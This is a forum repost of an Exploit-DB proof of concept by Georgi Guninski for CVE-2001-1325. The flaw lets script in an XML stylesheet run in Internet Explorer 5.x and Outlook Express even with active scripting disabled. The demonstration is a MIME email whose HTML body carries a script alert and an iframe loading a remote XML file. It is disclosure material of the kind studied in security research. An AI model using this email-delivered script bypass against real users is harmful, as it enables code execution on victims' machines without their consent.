Exploit Microsoft Internet Explorer 5.0/5.5 / OE 5.5 - XML Stylesheets Active Scripting

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
20782
Проверка EDB
  1. Пройдено
Автор
GEORGI GUNINSKI
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2001-1325
Дата публикации
2001-04-20
Код:
source: https://www.securityfocus.com/bid/2633/info

A vulnerability exists in the handling of XML stylesheets in Internet Explorer and Outlook Express. If active scripting is disabled in all security zones, IE and OE will still allow script to run if it is contained in the stylesheet of an XML page. 

From: "georgi" 
Subject: xstyle
Date: 
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000"
X-Priority: 3
X-MSMail-Priority: Normal



This is a multi-part message in MIME format.

------=_NextPart_000
Content-Type: text/html;
	charset="iso-8859-1"


test
<H1>
XStyle demo. Written by Georgi Guninski
</H1>

<SCRIPT>
alert("JS should not be working");
</SCRIPT>



<IFRAME SRC="http://www.guninski.com/xstyle.xml"></IFRAME>
------=_NextPart_000--
 
Источник
www.exploit-db.com

Похожие темы